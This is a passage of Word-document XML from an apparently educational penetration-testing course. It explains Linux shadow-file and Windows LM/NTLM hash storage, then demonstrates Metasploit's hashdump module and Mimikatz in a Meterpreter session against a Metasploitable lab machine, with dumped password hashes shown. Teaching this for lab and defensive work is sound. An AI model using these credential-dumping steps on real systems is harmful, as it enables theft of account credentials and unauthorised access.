    </w:p>
    <w:p w14:paraId="6AA43232" w14:textId="77777777" w:rsidR="000362D3" w:rsidRDefault="000362D3" w:rsidP="000362D3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>root@kali:~# cat /etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0375167A" w14:textId="382690FD" w:rsidR="000362D3" w:rsidRDefault="000362D3" w:rsidP="000362D3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>root:$1$EtzbsH3q$MVDBItFFtoV.PTlfHvD8M.:17697:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E17FC5" w14:textId="4638933B" w:rsidR="000D47BA" w:rsidRDefault="008044DB" w:rsidP="00CA452C">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>The format is the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A630C9" w14:textId="5103E907" w:rsidR="008044DB" w:rsidRDefault="008044DB" w:rsidP="008044DB">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Username</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16ABFE24" w14:textId="5053485F" w:rsidR="008044DB" w:rsidRDefault="008044DB" w:rsidP="008044DB">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Encrypted password. The usual format is $id$salt$hash. On GNU/Linux the algorithms’ id are:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="2263" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1423"/>
        <w:gridCol w:w="1412"/>
      </w:tblGrid>
      <w:tr w:rsidR="008044DB" w14:paraId="2F718036" w14:textId="77777777" w:rsidTr="008044DB">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="284"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1423" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p w14:paraId="77E8DF80" w14:textId="77C924DE" w:rsidR="008044DB" w:rsidRDefault="008044DB" w:rsidP="008044DB">
            <w:pPr>
              <w:pStyle w:val="Text"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1412" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p w14:paraId="3BD32CFB" w14:textId="718CFBAC" w:rsidR="008044DB" w:rsidRDefault="008044DB" w:rsidP="008044DB">
            <w:pPr>
              <w:pStyle w:val="Text"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Algorithm</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008044DB" w14:paraId="3FAA4E68" w14:textId="77777777" w:rsidTr="008044DB">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="284"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1423" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30506817" w14:textId="6F0354E1" w:rsidR="008044DB" w:rsidRDefault="008044DB" w:rsidP="008044DB">
            <w:pPr>
              <w:pStyle w:val="Text"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1412" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17B61758" w14:textId="7F576176" w:rsidR="008044DB" w:rsidRDefault="008044DB" w:rsidP="008044DB">
            <w:pPr>
              <w:pStyle w:val="Text"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>MD5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008044DB" w14:paraId="23BE3F05" w14:textId="77777777" w:rsidTr="008044DB">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="284"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1423" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="038EB18B" w14:textId="4938ACEE" w:rsidR="008044DB" w:rsidRDefault="008044DB" w:rsidP="008044DB">
            <w:pPr>
              <w:pStyle w:val="Text"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>2a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1412" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="143DD919" w14:textId="4FAAA840" w:rsidR="008044DB" w:rsidRDefault="008044DB" w:rsidP="008044DB">
            <w:pPr>
              <w:pStyle w:val="Text"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Blowfish</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008044DB" w14:paraId="67ADA247" w14:textId="77777777" w:rsidTr="008044DB">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="284"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1423" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5484595D" w14:textId="3DF8FA49" w:rsidR="008044DB" w:rsidRDefault="008044DB" w:rsidP="008044DB">
            <w:pPr>
              <w:pStyle w:val="Text"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>2y</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1412" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7465279D" w14:textId="323E88E9" w:rsidR="008044DB" w:rsidRDefault="008044DB" w:rsidP="008044DB">
            <w:pPr>
              <w:pStyle w:val="Text"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Blowfish</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008044DB" w14:paraId="72267762" w14:textId="77777777" w:rsidTr="008044DB">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="284"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1423" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B375B88" w14:textId="586AA392" w:rsidR="008044DB" w:rsidRDefault="008044DB" w:rsidP="008044DB">
            <w:pPr>
              <w:pStyle w:val="Text"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1412" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65BF2CCC" w14:textId="7DEEE7ED" w:rsidR="008044DB" w:rsidRDefault="008044DB" w:rsidP="008044DB">
            <w:pPr>
              <w:pStyle w:val="Text"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>SHA-256</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008044DB" w14:paraId="73013622" w14:textId="77777777" w:rsidTr="008044DB">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="284"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1423" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15F44D89" w14:textId="732547CA" w:rsidR="008044DB" w:rsidRDefault="008044DB" w:rsidP="008044DB">
            <w:pPr>
              <w:pStyle w:val="Text"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1412" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="584F3DC3" w14:textId="5EB88C45" w:rsidR="008044DB" w:rsidRDefault="008044DB" w:rsidP="008044DB">
            <w:pPr>
              <w:pStyle w:val="Text"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>SHA-512</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="260C4612" w14:textId="77777777" w:rsidR="008044DB" w:rsidRDefault="008044DB" w:rsidP="008044DB">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28E89CA7" w14:textId="5726DE4D" w:rsidR="008044DB" w:rsidRDefault="008044DB" w:rsidP="008044DB">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Last password change</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092B05D8" w14:textId="255B22A8" w:rsidR="008044DB" w:rsidRDefault="008044DB" w:rsidP="008044DB">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Minimum number of days required between password changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344D4E97" w14:textId="28647827" w:rsidR="008044DB" w:rsidRDefault="008044DB" w:rsidP="008044DB">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Maximum number of days the password is valid (after that date, the user must change his password)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31623B19" w14:textId="53A492A0" w:rsidR="008044DB" w:rsidRDefault="008044DB" w:rsidP="008044DB">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Warn: when should the user be warned his password is to expire</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B99F258" w14:textId="1C9E806D" w:rsidR="008044DB" w:rsidRDefault="008044DB" w:rsidP="008044DB">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Inactive: when is disabled the account (number after the password expired)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506DA424" w14:textId="6F89276A" w:rsidR="005E7E5F" w:rsidRDefault="005E7E5F" w:rsidP="005E7E5F">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">More on the shadow file on the </w:t>
      </w:r>
      <w:hyperlink r:id="rId26" w:anchor="Shadowed_passwords" w:history="1">
        <w:r w:rsidRPr="005E7E5F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Wikipedia page</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE5EF94" w14:textId="1CA61B83" w:rsidR="00C76E6D" w:rsidRDefault="00C76E6D" w:rsidP="00C76E6D">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">It is possible to </w:t>
      </w:r>
      <w:r w:rsidR="005E7E5F">
        <w:t>get the hash back using OpenSSL</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751B1F54" w14:textId="77777777" w:rsidR="00D64EB9" w:rsidRDefault="00D64EB9" w:rsidP="00D64EB9">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>root@kali:~# openssl passwd -1 -salt EtzbsH3q telindus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E8A35D" w14:textId="2C8DE110" w:rsidR="00D64EB9" w:rsidRDefault="00D64EB9" w:rsidP="00D64EB9">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>$1$EtzbsH3q$MVDBItFFtoV.PTlfHvD8M.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FBAF8C" w14:textId="2A33163B" w:rsidR="0071529A" w:rsidRDefault="0071529A" w:rsidP="006213FC">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5B1DFD" w14:textId="3C1C8688" w:rsidR="00A52A00" w:rsidRDefault="00A52A00" w:rsidP="00A52A00">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Windows passwords are stored in the SAM database (Security Accounts Manager). This file can be found in </w:t>
      </w:r>
      <w:r w:rsidR="007624CF">
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>%SystemRoot%/System32/config/SAM</w:t>
      </w:r>
      <w:r w:rsidR="007624CF">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00515AC7">
        <w:t xml:space="preserve"> and requires administrator privileges.</w:t>
      </w:r>
      <w:r w:rsidR="003405CF">
        <w:t xml:space="preserve"> Both LM and NTLM hashes are in use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DCA58C" w14:textId="64B39AE8" w:rsidR="003D5233" w:rsidRDefault="003D5233" w:rsidP="00A52A00">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The LM hash was the hashing algorithm used by</w:t>
      </w:r>
      <w:r w:rsidR="0006310C">
        <w:t xml:space="preserve"> Windows to store user password.</w:t>
      </w:r>
      <w:r w:rsidR="007A3B5E">
        <w:t xml:space="preserve"> It is still in use for backward compatibility even if Microsoft advise administrators to turn it off.</w:t>
      </w:r>
      <w:r w:rsidR="00F007E3">
        <w:t xml:space="preserve"> It suffers from several security weakness and a modern computer can crack any LM hash in a few hours.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359CAA54" w14:textId="13D63B44" w:rsidR="005E7E5F" w:rsidRPr="005E7E5F" w:rsidRDefault="00A9374F" w:rsidP="005E7E5F">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>The NTLM</w:t>
      </w:r>
      <w:r w:rsidR="00F6037C">
        <w:t xml:space="preserve"> hash is the successor of the LM hash. It is a challenge-response </w:t>
      </w:r>
      <w:r w:rsidR="007B0AFB">
        <w:t>protocol, which</w:t>
      </w:r>
      <w:r w:rsidR="00F6037C">
        <w:t xml:space="preserve"> uses three messages to authenticate a user. </w:t>
      </w:r>
      <w:r w:rsidR="007B0AFB">
        <w:t>NTLM password are not salted which means that it is possible to authenticate to a server</w:t>
      </w:r>
      <w:r w:rsidR="00EF61D9">
        <w:t xml:space="preserve"> or to run process as another user</w:t>
      </w:r>
      <w:r w:rsidR="007B0AFB">
        <w:t xml:space="preserve"> without knowing the actual password (</w:t>
      </w:r>
      <w:r w:rsidR="00F05496">
        <w:t>pass</w:t>
      </w:r>
      <w:r w:rsidR="00EF61D9">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00F05496">
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="00EF61D9">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00F05496">
        <w:t>hash attack</w:t>
      </w:r>
      <w:r w:rsidR="007B0AFB">
        <w:t>).</w:t>
      </w:r>
      <w:r w:rsidR="002A0B5B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F6037C">
        <w:t>NTLM passwords are also considered weak because they can be brute-force easily with modern computer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772DDBAC" w14:textId="01D8CFA3" w:rsidR="00980E9E" w:rsidRDefault="00980E9E" w:rsidP="006213FC">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Hashdump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A24587" w14:textId="0B705BCB" w:rsidR="00B34281" w:rsidRDefault="00B34281" w:rsidP="00B34281">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Hashdump is a post exploitation module in Metasploit and available for Windows, Linux and Mac OSX operating syste</w:t>
      </w:r>
      <w:r w:rsidR="00714614">
        <w:t>m. It gathers password files (i.e. /etc/passwd, /etc/shadow…) and download them on the Kali machine (in ~/.msf4/loot/).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707E2F6B" w14:textId="3E5F2563" w:rsidR="00714614" w:rsidRPr="00B34281" w:rsidRDefault="00714614" w:rsidP="00714614">
      <w:pPr>
        <w:pStyle w:val="Hands-on"/>
      </w:pPr>
      <w:r>
        <w:t>HANDS ON</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">          DEMO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFA68EC" w14:textId="021B656C" w:rsidR="002F7918" w:rsidRDefault="00714614" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Using the previously opened Meterpreter session on the Metasploitable machine, dump the hashes from inside the </w:t>
      </w:r>
      <w:r w:rsidR="00360650">
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">eterpreter session (this could also be executed </w:t>
      </w:r>
      <w:r w:rsidR="00360650">
        <w:t xml:space="preserve">simultaneously </w:t>
      </w:r>
      <w:r>
        <w:t>on multipl</w:t>
      </w:r>
      <w:r w:rsidR="00B805B9">
        <w:t>e machines from M</w:t>
      </w:r>
      <w:r>
        <w:t>etasploit).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAF8188" w14:textId="08AF597E" w:rsidR="00714614" w:rsidRDefault="00714614" w:rsidP="00714614">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">meterpreter &gt; run post/linux/gather/hashdump </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A091EB0" w14:textId="77777777" w:rsidR="00714614" w:rsidRDefault="00714614" w:rsidP="00714614">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AEB2F6F" w14:textId="77777777" w:rsidR="00714614" w:rsidRDefault="00714614" w:rsidP="00714614">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:0:0:root:/root:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B87ABF0" w14:textId="77777777" w:rsidR="00714614" w:rsidRDefault="00714614" w:rsidP="00714614">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:3:3:sys:/dev:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDBDE59" w14:textId="77777777" w:rsidR="00714614" w:rsidRDefault="00714614" w:rsidP="00714614">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:103:104::/home/klog:/bin/false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EDACBD" w14:textId="77777777" w:rsidR="00714614" w:rsidRDefault="00714614" w:rsidP="00714614">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70088F2C" w14:textId="77777777" w:rsidR="00714614" w:rsidRDefault="00714614" w:rsidP="00714614">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136973E3" w14:textId="77777777" w:rsidR="00714614" w:rsidRDefault="00714614" w:rsidP="00714614">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:1001:1001:just a user,111,,:/home/user:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8F8A54" w14:textId="77777777" w:rsidR="00714614" w:rsidRDefault="00714614" w:rsidP="00714614">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:1002:1002:,,,:/home/service:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BAA190" w14:textId="53CA4F44" w:rsidR="00714614" w:rsidRDefault="00714614" w:rsidP="00714614">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] Unshadowed Password File: /root/.msf4/loot/20180704013208_default_</w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t>_linux.hashes_199196.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B799259" w14:textId="50EEBF3A" w:rsidR="00714614" w:rsidRPr="002F7918" w:rsidRDefault="005C4ABA" w:rsidP="005C4ABA">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>The module even unshadow the password file for us!</w:t>
      </w:r>
      <w:r w:rsidR="001D19D8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4C58FA" w14:textId="4B8FDFDA" w:rsidR="00980E9E" w:rsidRDefault="00980E9E" w:rsidP="006213FC">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E109A3B" w14:textId="6EFF789B" w:rsidR="0002000D" w:rsidRDefault="007E5B8C" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mimikatz is a post exploitation </w:t>
      </w:r>
      <w:r w:rsidR="00BD7B1B">
        <w:t>tool, which</w:t>
      </w:r>
      <w:r w:rsidR="0002000D">
        <w:t xml:space="preserve"> helps attackers with common tasks in a pentest, such as dumping NTLM hashes, Kerberos passwords…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08735AB9" w14:textId="0DD6795A" w:rsidR="00E77379" w:rsidRDefault="0011101F" w:rsidP="006213FC">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:t>On the target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F274DAC" w14:textId="73BA5443" w:rsidR="00E77379" w:rsidRDefault="00E77379" w:rsidP="00E77379">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>The Local Security Authority Subsystem Service (LASASS.exe) is a service responsible for providing single sign-on (SSO) in windows so that user are not required to reauthenticate each time they access resources. Mimikatz exploit</w:t>
      </w:r>
      <w:r w:rsidR="00617153">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the LSASS cache of credential</w:t>
      </w:r>
      <w:r w:rsidR="00223E88">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and reports the results to the user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED1F021" w14:textId="5FB90391" w:rsidR="00B533D6" w:rsidRDefault="00B533D6" w:rsidP="00E77379">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To retrieve </w:t>
      </w:r>
      <w:r w:rsidR="00EF61D9">
        <w:t>clear text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> password, Mimikatz requires Administrator privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CAB04F" w14:textId="25905F95" w:rsidR="00EF61D9" w:rsidRDefault="00861C47" w:rsidP="00E77379">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidR="00EF61D9">
        <w:t>ote</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> also</w:t>
      </w:r>
      <w:r w:rsidR="00EF61D9">
        <w:t xml:space="preserve"> that starting from Windows 8.1, LSASS no longer stores clear text passwords in memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3FE92D" w14:textId="77777777" w:rsidR="00EF61D9" w:rsidRPr="00E77379" w:rsidRDefault="00EF61D9" w:rsidP="00E77379">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4254F05B" w14:textId="507E6544" w:rsidR="00FD58BF" w:rsidRDefault="00B86AF4" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>In this section we’ll use it to dump passwords and hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEDB0CE" w14:textId="77777777" w:rsidR="00201A33" w:rsidRDefault="00201A33" w:rsidP="00201A33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt; load mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA4B8C9" w14:textId="77777777" w:rsidR="00201A33" w:rsidRDefault="00201A33" w:rsidP="00201A33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Loading extension mimikatz...Success.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3951CADD" w14:textId="77777777" w:rsidR="00201A33" w:rsidRDefault="00201A33" w:rsidP="00201A33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11E063F1" w14:textId="77777777" w:rsidR="00201A33" w:rsidRDefault="00201A33" w:rsidP="00201A33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6866DE5A" w14:textId="77777777" w:rsidR="00201A33" w:rsidRDefault="00201A33" w:rsidP="00201A33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Mimikatz Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6D1FAD" w14:textId="77777777" w:rsidR="00201A33" w:rsidRDefault="00201A33" w:rsidP="00201A33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>=================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6508C9" w14:textId="77777777" w:rsidR="00201A33" w:rsidRDefault="00201A33" w:rsidP="00201A33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="350EF82A" w14:textId="77777777" w:rsidR="00201A33" w:rsidRDefault="00201A33" w:rsidP="00201A33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Command           Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A532187" w14:textId="77777777" w:rsidR="00201A33" w:rsidRDefault="00201A33" w:rsidP="00201A33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    -------           -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0239E95A" w14:textId="77777777" w:rsidR="00201A33" w:rsidRDefault="00201A33" w:rsidP="00201A33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    kerberos          Attempt to retrieve kerberos creds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B9C2BE" w14:textId="77777777" w:rsidR="00201A33" w:rsidRDefault="00201A33" w:rsidP="00201A33">
      <w:pPr>
